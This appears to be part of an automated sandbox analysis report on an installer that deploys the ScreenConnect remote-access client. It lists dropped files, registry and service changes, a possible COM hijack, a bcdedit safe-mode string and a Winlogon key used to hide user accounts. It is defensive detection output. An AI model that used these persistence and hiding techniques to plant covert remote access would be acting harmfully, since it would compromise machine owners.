                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F649E0 push eax; mov dword ptr [esp], edx0_2_05F649F4
                                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_072C21E8 push FFFFFFC3h; ret 5_3_072C220A
                                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_3_072C723B push eax; iretd 5_3_072C7245
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05EFBC98 push eax; iretd 8_2_05EFBC99
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3C0958 push ebx; retf 9_2_00007FF9CC3C098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3C09D8 push ebx; retf 9_2_00007FF9CC3C098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3C22ED push ebx; retf 9_2_00007FF9CC3C22FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC6C2672 push ds; iretd 9_2_00007FF9CC6C2674
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3D0958 push ebx; retf 11_2_00007FF9CC3D098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3D09D8 push ebx; retf 11_2_00007FF9CC3D098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3D22B1 push ebx; retf 11_2_00007FF9CC3D22FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3D22FB push ebx; retf 11_2_00007FF9CC3D22FA

                                  Persistence and Installation Behavior

                                  barindex
                                  Possible COM Object hijacking
                                  Source: c:\program files (x86)\screenconnect client (a9232c38f7080cfd)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-abc2-b94479dc0550}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI837B.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8195.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7753.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI837B.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8195.tmpJump to dropped file
                                  Source: ScreenConnect.ClientService.dll.3.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a9232c38f7080cfd)Jump to behavior

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Contains functionality to hide user accounts
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000005.00000003.1074517590.0000000004E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1172386880.000000001C282000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160002867.00000000019C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160464436.0000000001A52000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: Support.ClientSetup.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.5.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.3.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
